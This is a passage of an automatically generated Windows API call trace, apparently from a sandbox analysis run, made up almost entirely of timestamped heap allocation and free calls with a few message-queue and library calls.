(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0188.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0188.700] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.702] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0188.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0188.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.706] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.707] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0188.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1990 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0188.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0188.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 